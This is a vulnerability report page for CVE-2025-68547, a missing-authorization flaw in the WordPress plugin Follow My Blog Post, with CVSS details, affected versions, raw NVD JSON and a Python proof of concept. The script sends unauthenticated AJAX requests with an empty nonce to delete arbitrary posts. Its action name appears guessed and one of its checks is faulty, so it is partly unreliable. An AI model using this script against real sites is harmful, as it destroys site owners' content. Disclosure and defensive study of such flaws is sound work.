Security Vulnerability Report
中文
CVE-2025-68547 CVSS 7.5 HIGH

CVE-2025-68547

Published: 2026-01-05 11:17:42
Last Modified: 2026-04-23 15:36:00

Description

Missing Authorization vulnerability in wpweb Follow My Blog Post follow-my-blog-post allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Follow My Blog Post: from n/a through <= 2.4.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:wpwebelite:follow_my_blog_post:*:*:*:*:*:wordpress:*:* - VULNERABLE
Follow My Blog Post <= 2.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68547 PoC - WordPress Follow My Blog Post Plugin Authorization Bypass # Affected: Follow My Blog Post <= 2.4.0 import requests import sys target_url = "http://target-wordpress-site.com" # Step 1: Identify the vulnerable endpoint vulnerable_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Step 2: Construct malicious request to delete arbitrary content payload = { "action": "fmbp_delete_content", # Plugin's AJAX action "post_id": "1", # Target post ID to delete "nonce": "" # Empty nonce - demonstrating lack of authorization check } print(f"[*] Sending malicious request to {vulnerable_endpoint}") print(f"[*] Target URL: {target_url}") print(f"[*] Payload: {payload}") try: response = requests.post(vulnerable_endpoint, data=payload, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Content: {response.text[:200]}") # Check if deletion was successful if "deleted" in response.text.lower() or response.status_code == 1: print("[!] Content deletion successful - Vulnerability confirmed!") else: print("[*] Response received - verify manually") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") sys.exit(1) print("\n[*] Note: This PoC demonstrates the authorization bypass vulnerability") print("[*] Always obtain proper authorization before testing")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68547", "sourceIdentifier": "[email protected]", "published": "2026-01-05T11:17:41.973", "lastModified": "2026-04-23T15:36:00.373", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in wpweb Follow My Blog Post follow-my-blog-post allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Follow My Blog Post: from n/a through <= 2.4.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wpwebelite:follow_my_blog_post:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "2.4.1", "matchCriteriaId": "8178E48C-1BCF-45F4-A8C5-E4348E94429E"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/follow-my-blog-post/vulnerability/wordpress-follow-my-blog-post-plugin-2-4-0-arbitrary-content-deletion-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}